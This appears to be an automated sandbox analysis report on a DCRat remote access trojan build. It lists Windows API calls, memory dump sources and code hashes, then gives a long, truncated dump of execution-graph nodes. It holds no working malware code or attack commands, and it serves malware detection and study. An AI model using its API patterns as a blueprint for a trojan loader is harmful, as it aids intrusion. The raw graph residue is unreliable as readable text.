                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,0049DA55,?), ref: 0049E2A3
                                                                                                                        • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0049DA55,?), ref: 0049E2B1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FindHandleModuleResource
                                                                                                                        • String ID: RTL
                                                                                                                        • API String ID: 3537982541-834975271
                                                                                                                        • Opcode ID: 6da1e1d0a2802855d718f15f70df48fc9a58a3a74832a24cc999cc02cffd3975
                                                                                                                        • Instruction ID: 17e8b593a34bd936f6e89b65f8c7e3306d20af71a3dbda80672643a6d9494b01
                                                                                                                        • Opcode Fuzzy Hash: 6da1e1d0a2802855d718f15f70df48fc9a58a3a74832a24cc999cc02cffd3975
                                                                                                                        • Instruction Fuzzy Hash: CFC080326407106AEB705F767C0DF437F586B01B13F09446DB141E92D5D6E9C940C7E5
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE467
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: UJ$zJ
                                                                                                                        • API String ID: 1269201914-921788173
                                                                                                                        • Opcode ID: b557a1e653d1d2a806cf0021837c5d89cc2ab8c4eef54a1f556d399912169711
                                                                                                                        • Instruction ID: 895fbd48164b3ae8a25a523311d2b950b4ea00c8dde395dd3651120bb751e084
                                                                                                                        • Opcode Fuzzy Hash: b557a1e653d1d2a806cf0021837c5d89cc2ab8c4eef54a1f556d399912169711
                                                                                                                        • Instruction Fuzzy Hash: 71B012D57580007C314461175D02F37010CC1DEF15330802FF528C1086DD4C0E01053F
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE467
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: UJ$pJ
                                                                                                                        • API String ID: 1269201914-2084652972
                                                                                                                        • Opcode ID: 98876692d50b36e9387a3dffb8d63557e21fd5675d94188d5e8e5f097a1341b3
                                                                                                                        • Instruction ID: 8c5b27a14cc86fb838336a614fd716efb8decd83b76020160d40842c39ed18de
                                                                                                                        • Opcode Fuzzy Hash: 98876692d50b36e9387a3dffb8d63557e21fd5675d94188d5e8e5f097a1341b3
                                                                                                                        • Instruction Fuzzy Hash: 4DB012C5759040BC3144A1171D02E37010CC1DEB55330C02FF928C1085DD4C4C01053F

Execution Graph

Execution Coverage: 6.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 6.1%
Total number of Nodes: 1527
Total number of Limit Nodes: 58
execution_graph: node and edge listing of the rendered execution graph (interactive graph residue, truncated in this extract). API calls named on the listed paths: CreateFileW, CloseHandle, WriteFile, MoveFileW, GetModuleHandleW, GetProcAddress, LoadLibraryExW, GetSystemDirectoryW, FindResourceW, LoadResource, LockResource, SizeofResource, FindClose, GetProcessHeap, RtlAllocateHeap, EnterCriticalSection, SleepConditionVariableCS, WaitForSingleObjectEx, RtlWakeAllConditionVariable, SetEvent, ResetEvent, RaiseException, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess.
49906->49909 49907->49897 49907->49904 49908 861acd 49998 a1b21f 38 API calls ___std_exception_copy 49908->49998 49914 861b99 49909->49914 49911->49907 49997 a1b33f 11 API calls __Wcscoll 49911->49997 49912 861f4c 49913 84a8a0 2 API calls 49912->49913 49918 861f56 49913->49918 49914->49912 49915 861bc1 49914->49915 49916 861bcf 49914->49916 49919 84a190 47 API calls 49915->49919 50000 84a720 40 API calls 4 library calls 49916->50000 49921 86219c 49918->49921 49923 8621c0 49918->49923 49927 861fd5 49918->49927 49920 861bcd 49919->49920 49922 861e3c 49920->49922 49925 861c16 PathIsUNCW 49920->49925 49926 861d65 FindFirstFileW 49920->49926 49921->49888 49922->49888 49924 84a8a0 2 API calls 49923->49924 49928 8621ca 49924->49928 49929 861cf5 49925->49929 49930 861c2b 49925->49930 49926->49922 49931 861d7d GetFullPathNameW 49926->49931 49932 861ff2 49927->49932 50055 862420 40 API calls 49927->50055 50048 8552f0 52 API calls 4 library calls 49929->50048 50001 8552f0 52 API calls 4 library calls 49930->50001 49936 861d96 49931->49936 49976 861ed1 ___crtLCMapStringW 49931->49976 50056 862370 52 API calls 49932->50056 49939 861db1 GetFullPathNameW 49936->49939 50050 84a6b0 38 API calls 49936->50050 49937 861ffd 49941 861a20 104 API calls 49937->49941 49938 84a8a0 2 API calls 49938->49912 49943 861dca ___crtLCMapStringW 49939->49943 49944 862011 49941->49944 49945 861e76 49943->49945 49957 861dfe 49943->49957 49943->49976 49944->49921 49946 862044 PathIsUNCW 49944->49946 49959 861e88 _wcsrchr 49945->49959 50051 84a5a0 38 API calls 4 library calls 49945->50051 49948 862127 49946->49948 49949 862058 49946->49949 49947 861c33 49947->49926 50002 8556e0 49947->50002 50058 8552f0 52 API calls 4 library calls 49948->50058 50057 8552f0 52 API calls 4 library calls 49949->50057 49954 861cae 49958 862300 40 API calls 49954->49958 49956 861e34 SetLastError 49956->49922 49957->49956 49960 861e27 FindClose 49957->49960 49961 861cc1 49958->49961 49964 861ea8 _wcsrchr 49959->49964 50052 
84a5a0 38 API calls 4 library calls 49959->50052 49960->49956 49961->49926 49963 861ce6 49961->49963 50049 8621d0 40 API calls 3 library calls 49963->50049 49965 861ed5 49964->49965 49966 861ebb 49964->49966 49965->49976 50054 84a5a0 38 API calls 4 library calls 49965->50054 49968 861f23 49966->49968 49966->49976 50053 84a5a0 38 API calls 4 library calls 49966->50053 49967 862060 49967->49921 49969 8556e0 97 API calls 49967->49969 49968->49922 49972 8620e1 49969->49972 49970 8620f3 49970->49921 50059 8621d0 40 API calls 3 library calls 49970->50059 49975 862300 40 API calls 49972->49975 49975->49970 49976->49938 49976->49968 49979 a15dde ___std_exception_copy 49977->49979 49978 91dbc2 49984 85e880 49978->49984 49979->49978 49981 a15dfa std::_Facet_Register 49979->49981 50065 a2b483 EnterCriticalSection std::_Facet_Register 49979->50065 50066 a17b2a 49981->50066 49983 a16c40 49985 85e89d 49984->49985 49995 85e917 std::ios_base::_Ios_base_dtor 49984->49995 49986 85e95d 49985->49986 49988 85e8b4 49985->49988 49989 85e8db 49985->49989 50069 848730 39 API calls 3 library calls 49986->50069 49988->49986 49992 a15dd9 std::_Facet_Register 2 API calls 49988->49992 49991 a15dd9 std::_Facet_Register 2 API calls 49989->49991 49993 85e8c5 49989->49993 49990 85e962 49991->49993 49992->49993 49994 a1b22f std::_Throw_Cpp_error 38 API calls 49993->49994 49993->49995 49994->49986 49995->49885 49996->49911 49997->49908 49998->49907 49999->49906 50000->49920 50001->49947 50003 855870 50002->50003 50009 855737 50002->50009 50004 84a8a0 2 API calls 50003->50004 50005 85587a 50004->50005 50008 84a8a0 2 API calls 50005->50008 50006 855759 50006->49954 50007 84abe0 50 API calls 50014 85579b 50007->50014 50010 855889 50008->50010 50009->50006 50009->50007 50009->50014 50011 84a8a0 2 API calls 50010->50011 50012 855893 50011->50012 50013 8558da 50012->50013 50025 85595d ___std_exception_copy 50012->50025 50015 8558e1 50013->50015 50016 85593f GetWindowLongW 50013->50016 50014->50005 
50014->50010 50017 8557c3 50014->50017 50018 855b27 NtdllDefWindowProc_W 50015->50018 50020 855902 GetWindowLongW 50015->50020 50019 85594c 50016->50019 50017->50010 50026 855803 std::locale::_Setgloballocale 50017->50026 50029 855b49 ___std_exception_copy 50018->50029 50019->50018 50020->50018 50022 855918 GetWindowLongW SetWindowLongW NtdllDefWindowProc_W 50020->50022 50021 a15d9a _ValidateLocalCookies 5 API calls 50023 855b9e 50021->50023 50022->50029 50023->49954 50024 85581f std::locale::_Locimp::_Locimp 50024->49954 50028 8559db SetWindowTextW 50025->50028 50025->50029 50026->50024 50060 a1b33f 11 API calls __Wcscoll 50026->50060 50031 8559f7 50028->50031 50032 8559fd 50028->50032 50029->50021 50030 855841 50061 a1b21f 38 API calls ___std_exception_copy 50030->50061 50031->50032 50034 855a8b 50032->50034 50035 855a13 GlobalAlloc 50032->50035 50034->50029 50064 855e00 74 API calls 5 library calls 50034->50064 50035->50034 50036 855a23 GlobalLock 50035->50036 50040 855a38 std::locale::_Setgloballocale 50036->50040 50038 855abe 50041 855b37 50038->50041 50045 855ad7 SetWindowLongW 50038->50045 50044 855a3d std::locale::_Locimp::_Locimp 50040->50044 50062 a1b33f 11 API calls __Wcscoll 50040->50062 50041->50029 50042 855a5b 50063 a1b21f 38 API calls ___std_exception_copy 50042->50063 50046 855a71 GlobalUnlock 50044->50046 50047 855aeb ___std_exception_copy 50045->50047 50046->50034 50047->50019 50048->49961 50049->49926 50050->49939 50051->49959 50052->49964 50053->49976 50054->49976 50055->49932 50056->49937 50057->49967 50058->49970 50059->49921 50060->50030 50061->50024 50062->50042 50063->50044 50064->50038 50065->49979 50067 a17b71 RaiseException 50066->50067 50068 a17b44 50066->50068 50067->49983 50068->50067 50069->49990 50080 a15673 EnterCriticalSection 50070->50080 50072 849fe0 FindResourceExW 50075 849fc7 50072->50075 50074 a15673 4 API calls 50074->50075 50075->50072 50075->50074 50076 84a015 50075->50076 50084 84a050 LoadResource LockResource 
SizeofResource 50075->50084 50076->49817 50076->49818 50077->49821 50078->49822 50079->49825 50081 a15695 50080->50081 50082 a1568c 50080->50082 50081->50075 50082->50081 50085 a15650 RtlAllocateHeap EnterCriticalSection RaiseException 50082->50085 50084->50075 50085->50081 50086->49834 50087 954bf0 50088 954c3b 50087->50088 50091 954c28 50087->50091 50096 9444c0 46 API calls 5 library calls 50088->50096 50090 954c45 50093 848860 38 API calls 50090->50093 50092 a15d9a _ValidateLocalCookies 5 API calls 50091->50092 50095 954c8a 50092->50095 50094 954c71 50093->50094 50094->50091 50096->50090 50097 95f970 50135 95e0c0 39 API calls 50097->50135 50099 95f9af 50136 871f40 39 API calls 50099->50136 50101 95f9c7 50137 849cc0 39 API calls 50101->50137 50103 95f9dd 50104 848860 38 API calls 50103->50104 50105 95f9ef 50104->50105 50106 95fc58 50105->50106 50107 95fa29 std::ios_base::_Ios_base_dtor std::locale::_Setgloballocale 50105->50107 50108 a1b22f std::_Throw_Cpp_error 38 API calls 50106->50108 50112 95fab2 50107->50112 50170 859260 51 API calls 50107->50170 50113 95fc5d 50108->50113 50110 95faea 50172 8481d0 50110->50172 50138 9689c0 50112->50138 50116 a1b22f std::_Throw_Cpp_error 38 API calls 50113->50116 50115 95fa83 50171 8480a0 39 API calls std::locale::_Locimp::_Locimp 50115->50171 50118 95fc62 50116->50118 50117 95fb21 50182 95e0c0 39 API calls 50117->50182 50120 8481d0 39 API calls 50118->50120 50123 95fcc9 50120->50123 50121 95fb35 50183 966840 57 API calls 5 library calls 50121->50183 50184 a17a05 50123->50184 50126 95fcdc 50127 848860 38 API calls 50129 95fc25 50127->50129 50128 95fbef std::ios_base::_Ios_base_dtor 50128->50127 50131 848860 38 API calls 50129->50131 50130 95fb55 std::ios_base::_Ios_base_dtor 50130->50113 50130->50128 50132 95fc37 50131->50132 50133 a15d9a _ValidateLocalCookies 5 API calls 50132->50133 50134 95fc52 50133->50134 50135->50099 50136->50101 50137->50103 50198 848750 50138->50198 50140 968a69 std::locale::_Setgloballocale 50141 
968a9a LoadStringW 50140->50141 50142 968acd 50141->50142 50146 968b80 std::locale::_Setgloballocale 50141->50146 50143 8481d0 39 API calls 50142->50143 50145 968aee 50143->50145 50144 968bd5 LoadStringW 50144->50146 50147 968bec 50144->50147 50149 848860 38 API calls 50145->50149 50157 968b00 std::ios_base::_Ios_base_dtor 50145->50157 50146->50144 50213 968dc0 40 API calls 2 library calls 50146->50213 50150 8481d0 39 API calls 50147->50150 50149->50157 50151 968c0d 50150->50151 50154 848860 38 API calls 50151->50154 50151->50157 50152 968cc9 std::ios_base::_Ios_base_dtor 50156 a15d9a _ValidateLocalCookies 5 API calls 50152->50156 50153 968d08 50155 a1b22f std::_Throw_Cpp_error 38 API calls 50153->50155 50154->50157 50158 968d0d 50155->50158 50159 968d01 50156->50159 50157->50152 50157->50153 50160 968dae 50158->50160 50161 968d91 SysAllocStringLen 50158->50161 50162 968d49 50158->50162 50159->50110 50163 84a8a0 2 API calls 50160->50163 50164 968d4e CLSIDFromString SysFreeString 50161->50164 50165 968da4 50161->50165 50162->50164 50166 968db8 50163->50166 50167 a15d9a _ValidateLocalCookies 5 API calls 50164->50167 50168 84a8a0 2 API calls 50165->50168 50169 968d8d 50167->50169 50168->50160 50169->50110 50170->50115 50171->50112 50173 84825e 50172->50173 50176 8481e0 50172->50176 50215 8487b0 39 API calls std::_Throw_Cpp_error 50173->50215 50175 8481ed std::locale::_Locimp::_Locimp 50175->50117 50176->50175 50179 848750 39 API calls 50176->50179 50177 848263 50178 8481d0 39 API calls 50177->50178 50180 8482bf 50178->50180 50181 848235 std::locale::_Locimp::_Locimp 50179->50181 50180->50117 50181->50117 50182->50121 50183->50130 50216 a17a13 50184->50216 50186 a17a0a 50187 a17a12 50186->50187 50232 a2f4be EnterCriticalSection std::locale::_Setgloballocale 50186->50232 50187->50126 50189 a1f8c0 50190 a1f8cb 50189->50190 50233 a2f503 38 API calls 6 library calls 50189->50233 50192 a1f8d5 IsProcessorFeaturePresent 50190->50192 50197 a1f8f4 50190->50197 50194 a1f8e1 
50192->50194 50234 a1b023 8 API calls 2 library calls 50194->50234 50196 a1f8fe 50235 a2165b 15 API calls std::locale::_Setgloballocale 50197->50235 50199 84879b 50198->50199 50200 84875b 50198->50200 50214 848730 39 API calls 3 library calls 50199->50214 50202 848764 50200->50202 50205 848786 50200->50205 50202->50199 50203 84876b 50202->50203 50208 a15dd9 std::_Facet_Register 2 API calls 50203->50208 50204 848796 50204->50140 50205->50204 50206 a15dd9 std::_Facet_Register 2 API calls 50205->50206 50209 848790 50206->50209 50207 a1b22f std::_Throw_Cpp_error 38 API calls 50210 8487a5 50207->50210 50211 848771 50208->50211 50209->50140 50211->50207 50212 84877a 50211->50212 50212->50140 50213->50146 50214->50211 50215->50177 50217 a17a1c 50216->50217 50218 a17a1f GetLastError 50216->50218 50217->50186 50236 a1abfd 6 API calls ___vcrt_FlsFree 50218->50236 50220 a17a34 50221 a17a53 50220->50221 50222 a17a99 SetLastError 50220->50222 50237 a1ac38 6 API calls ___vcrt_FlsFree 50220->50237 50221->50222 50222->50186 50224 a17a4d 50224->50221 50225 a17a57 50224->50225 50238 a28911 12 API calls __Wcscoll 50225->50238 50232->50189 50233->50190 50234->50197 50235->50196 50236->50220 50237->50224 50239 8770c0 50240 8770f2 50239->50240 50241 84abe0 50 API calls 50240->50241 50242 87712d 50241->50242 50243 877137 50242->50243 50244 877228 50242->50244 50247 877163 50243->50247 50248 877158 50243->50248 50245 84a8a0 2 API calls 50244->50245 50246 877232 50245->50246 50259 878e00 50246->50259 50367 84a720 40 API calls 4 library calls 50247->50367 50252 84a190 47 API calls 50248->50252 50250 87724e 50253 877161 CreateWindowExW SendMessageW SendMessageW 50252->50253 50368 857b30 27 API calls 50253->50368 50256 8771e7 50257 a15d9a _ValidateLocalCookies 5 API calls 50256->50257 50258 877224 50257->50258 50369 902260 43 API calls _ValidateLocalCookies 50259->50369 50261 878e37 SendMessageW 50370 902560 39 API calls 50261->50370 50264 878e68 50265 848860 38 API calls 50264->50265 50266 
878e8b 50265->50266 50267 848860 38 API calls 50266->50267 50268 878e9a 50267->50268 50279 878f39 std::ios_base::_Ios_base_dtor 50268->50279 50377 902560 39 API calls 50268->50377 50270 878ee9 50276 848860 38 API calls 50270->50276 50271 878fb0 50272 8481d0 39 API calls 50271->50272 50275 878fe3 50272->50275 50273 848860 38 API calls 50273->50279 50274 848860 38 API calls 50277 878f7e 50274->50277 50378 8480a0 39 API calls std::locale::_Locimp::_Locimp 50275->50378 50278 878f02 50276->50278 50277->50271 50277->50274 50278->50279 50281 879494 50278->50281 50279->50273 50279->50277 50283 a1b22f std::_Throw_Cpp_error 38 API calls 50281->50283 50282 879008 50379 8480a0 39 API calls std::locale::_Locimp::_Locimp 50282->50379 50285 879499 50283->50285 50287 a1b22f std::_Throw_Cpp_error 38 API calls 50285->50287 50286 879017 50380 8480a0 39 API calls std::locale::_Locimp::_Locimp 50286->50380 50288 87949e 50287->50288 50289 a1b22f std::_Throw_Cpp_error 38 API calls 50288->50289 50291 8794a3 50289->50291 50293 a1b22f std::_Throw_Cpp_error 38 API calls 50291->50293 50292 879036 50381 8480a0 39 API calls std::locale::_Locimp::_Locimp 50292->50381 50303 8794a8 50293->50303 50295 879045 50296 8481d0 39 API calls 50295->50296 50298 879074 50296->50298 50297 8798a8 50397 a210ed 38 API calls ___std_exception_copy 50297->50397 50299 8481d0 39 API calls 50298->50299 50307 87909c std::ios_base::_Ios_base_dtor 50299->50307 50301 8798d3 50302 a15d9a _ValidateLocalCookies 5 API calls 50301->50302 50304 8798fc 50302->50304 50303->50297 50305 87956e 50303->50305 50306 87957b 50303->50306 50304->50250 50383 8476d0 50305->50383 50394 848fe0 39 API calls 50306->50394 50307->50285 50309 879132 std::ios_base::_Ios_base_dtor 50307->50309 50311 8481d0 39 API calls 50309->50311 50315 879190 50311->50315 50312 8791e5 std::ios_base::_Ios_base_dtor 50313 8481d0 39 API calls 50312->50313 50321 879257 std::ios_base::_Ios_base_dtor 50313->50321 50314 879575 50316 8481d0 39 API calls 50314->50316 
50315->50288 50315->50312 50317 8795d4 50316->50317 50318 8481d0 39 API calls 50317->50318 50319 8795fc 50318->50319 50320 8481d0 39 API calls 50319->50320 50322 879624 50320->50322 50321->50291 50336 8792ed std::ios_base::_Ios_base_dtor 50321->50336 50371 9b4f20 50 API calls _ValidateLocalCookies 50322->50371 50325 879648 50372 9b2fa0 50325->50372 50326 87945d 50328 848860 38 API calls 50326->50328 50330 879479 50328->50330 50329 879657 50331 848860 38 API calls 50329->50331 50332 a15d9a _ValidateLocalCookies 5 API calls 50330->50332 50338 879669 std::ios_base::_Ios_base_dtor 50331->50338 50333 879490 50332->50333 50333->50250 50334 879741 std::ios_base::_Ios_base_dtor 50342 8481d0 39 API calls 50334->50342 50366 879870 50334->50366 50335 879902 50337 a1b22f std::_Throw_Cpp_error 38 API calls 50335->50337 50382 878880 40 API calls _ValidateLocalCookies 50336->50382 50341 879907 50337->50341 50338->50334 50338->50335 50339 879892 50396 848fe0 39 API calls 50339->50396 50340 879881 50343 8476d0 39 API calls 50340->50343 50345 879918 50341->50345 50398 87b3d0 39 API calls 50341->50398 50346 879790 50342->50346 50347 87988c 50343->50347 50345->50250 50349 8481d0 39 API calls 50346->50349 50350 848860 38 API calls 50347->50350 50352 8797b8 50349->50352 50350->50297 50351 879964 50351->50250 50353 8481d0 39 API calls 50352->50353 50354 8797e0 50353->50354 50395 9b4f20 50 API calls _ValidateLocalCookies 50354->50395 50356 879802 50357 879819 50356->50357 50358 848860 38 API calls 50356->50358 50359 848860 38 API calls 50357->50359 50358->50357 50360 87984c 50359->50360 50361 848860 38 API calls 50360->50361 50362 879858 50361->50362 50363 848860 38 API calls 50362->50363 50364 879864 50363->50364 50365 848860 38 API calls 50364->50365 50365->50366 50366->50339 50366->50340 50367->50253 50368->50256 50369->50261 50370->50264 50371->50325 50373 9b2fdf 50372->50373 50375 9b3023 50372->50375 50373->50329 50374 9b303b 50374->50329 50375->50374 50399 9b30f0 50375->50399 
50377->50270 50378->50282 50379->50286 50380->50292 50381->50295 50382->50326 50384 8476f6 50383->50384 50385 84776f 50384->50385 50390 847701 50384->50390 50420 8487b0 39 API calls std::_Throw_Cpp_error 50385->50420 50386 84770d std::locale::_Locimp::_Locimp 50386->50314 50388 847774 50389 84779e 50388->50389 50392 848860 38 API calls 50388->50392 50389->50314 50390->50386 50391 848750 39 API calls 50390->50391 50393 84774c std::locale::_Locimp::_Locimp 50391->50393 50392->50388 50393->50314 50394->50314 50395->50356 50396->50347 50397->50301 50398->50351 50400 9b3156 50399->50400 50402 9b3174 50400->50402 50418 968dc0 40 API calls 2 library calls 50400->50418 50403 9b3196 50402->50403 50405 8481d0 39 API calls 50402->50405 50404 9b31ec std::ios_base::_Ios_base_dtor 50403->50404 50406 a1b22f std::_Throw_Cpp_error 38 API calls 50403->50406 50404->50374 50405->50403 50407 9b3272 50406->50407 50408 9b3319 50407->50408 50419 9b5340 40 API calls std::locale::_Locimp::_Locimp 50407->50419 50410 8481d0 39 API calls 50408->50410 50413 9b336e std::ios_base::_Ios_base_dtor 50408->50413 50410->50413 50411 9b34f8 std::ios_base::_Ios_base_dtor 50414 a15d9a _ValidateLocalCookies 5 API calls 50411->50414 50412 9b3535 50415 a1b22f std::_Throw_Cpp_error 38 API calls 50412->50415 50413->50411 50413->50412 50416 9b3531 50414->50416 50417 9b353a 50415->50417 50416->50374 50418->50402 50419->50408 50420->50388 50421 87bba0 50422 87bbb3 std::ios_base::_Ios_base_dtor 50421->50422 50427 a179cd 50422->50427 50425 87bbdb 50426 87bbc9 SetUnhandledExceptionFilter 50426->50425 50428 a17a05 __set_se_translator 49 API calls 50427->50428 50429 a179d6 50428->50429 50430 a17a05 __set_se_translator 49 API calls 50429->50430 50431 87bbbd 50430->50431 50431->50425 50431->50426 50432 99a010 ResetEvent InternetConnectW 50433 99a04f GetLastError 50432->50433 50434 99a0a2 SetEvent 50432->50434 50435 99a08d 50433->50435 50437 99a05c 50433->50437 50434->50435 50436 99a080 WaitForSingleObject 50436->50435 
50436->50437 50437->50435 50437->50436 50438 a1336f 50464 a130cd 50438->50464 50440 a1337f 50441 a133dc 50440->50441 50452 a13400 50440->50452 50473 a1330d 6 API calls 2 library calls 50441->50473 50443 a133e7 RaiseException 50457 a135d5 50443->50457 50444 a134eb 50448 a135a7 50444->50448 50451 a13549 GetProcAddress 50444->50451 50445 a13478 LoadLibraryExA 50446 a134d9 50445->50446 50447 a1348b GetLastError 50445->50447 50446->50444 50449 a134e4 FreeLibrary 50446->50449 50450 a134b4 50447->50450 50461 a1349e 50447->50461 50476 a1330d 6 API calls 2 library calls 50448->50476 50449->50444 50474 a1330d 6 API calls 2 library calls 50450->50474 50451->50448 50453 a13559 GetLastError 50451->50453 50452->50444 50452->50445 50452->50446 50452->50448 50459 a1356c 50453->50459 50456 a134bf RaiseException 50456->50457 50459->50448 50475 a1330d 6 API calls 2 library calls 50459->50475 50460 a1358d RaiseException 50462 a130cd DloadAcquireSectionWriteAccess 6 API calls 50460->50462 50461->50446 50461->50450 50463 a135a4 50462->50463 50463->50448 50465 a130d9 50464->50465 50466 a130ff 50464->50466 50477 a13176 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 50465->50477 50466->50440 50468 a130de 50469 a130fa 50468->50469 50478 a1329f VirtualQuery GetSystemInfo VirtualProtect DloadProtectSection 50468->50478 50479 a13100 GetModuleHandleW GetProcAddress GetProcAddress 50469->50479 50472 a13348 50472->50440 50473->50443 50474->50456 50475->50460 50476->50457 50477->50468 50478->50469 50479->50472 50480 84aab0 50481 84aabc 50480->50481 50482 84aaf4 50480->50482 50481->50482 50483 84a8a0 2 API calls 50481->50483 50483->50482 50484 84ae30 50485 84ae8d 50484->50485 50486 84ae6f 50484->50486 50487 84ae82 50486->50487 50488 84ae94 50486->50488 50487->50485 50500 a13837 RaiseException Concurrency::cancel_current_task 50487->50500 50492 84b250 50488->50492 50493 84b289 50492->50493 50494 84b2ea 50492->50494 50501 84b440 50493->50501 50495 a15d9a 
_ValidateLocalCookies 5 API calls 50494->50495 50497 84b327 50495->50497 50497->50485 50504 84b477 50501->50504 50502 a15d9a _ValidateLocalCookies 5 API calls 50503 84b2b6 SendMessageW 50502->50503 50503->50494 50504->50502 50505 945500 50506 945537 50505->50506 50512 945577 50505->50512 50507 a162a2 4 API calls 50506->50507 50508 945541 50507->50508 50508->50512 50513 a1615a 41 API calls 50508->50513 50510 945563 50514 a16258 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 50510->50514 50513->50510 50514->50512 50515 84ab30 50516 84ab76 50515->50516 50517 84ab39 50515->50517 50517->50516 50519 84a960 50517->50519 50520 84a9a1 50519->50520 50521 84a989 50519->50521 50522 84a9c1 RtlReAllocateHeap 50520->50522 50523 84a9a8 50520->50523 50521->50516 50522->50516 50523->50516 50524 87bcf0 50527 87bd39 50524->50527 50525 87bd5e 50526 848860 38 API calls 50525->50526 50528 87bd6d 50526->50528 50527->50525 50587 84d520 39 API calls 3 library calls 50527->50587 50530 8481d0 39 API calls 50528->50530 50531 87bd91 50530->50531 50583 9b3540 50531->50583 50534 87be7d 50536 a1b22f std::_Throw_Cpp_error 38 API calls 50534->50536 50535 87bdde std::ios_base::_Ios_base_dtor 50537 87be13 LoadLibraryExW 50535->50537 50538 87be4f 50535->50538 50539 87be82 50536->50539 50537->50538 50540 87be25 GetProcAddress GetProcAddress GetProcAddress 50537->50540 50542 a15d9a _ValidateLocalCookies 5 API calls 50538->50542 50541 84abe0 50 API calls 50539->50541 50540->50538 50543 87beca 50541->50543 50544 87be77 50542->50544 50545 87bfe1 50543->50545 50549 87bed4 50543->50549 50546 84a8a0 2 API calls 50545->50546 50547 87bfeb 50546->50547 50548 84abe0 50 API calls 50547->50548 50550 87c023 50548->50550 50551 861a20 112 API calls 50549->50551 50552 87c11c 50550->50552 50557 84abe0 50 API calls 50550->50557 50553 87bf19 50551->50553 50554 84a8a0 2 API calls 50552->50554 50555 861a20 112 API calls 50553->50555 50556 87c126 50554->50556 50558 87bf28 50555->50558 50559 87c04a 
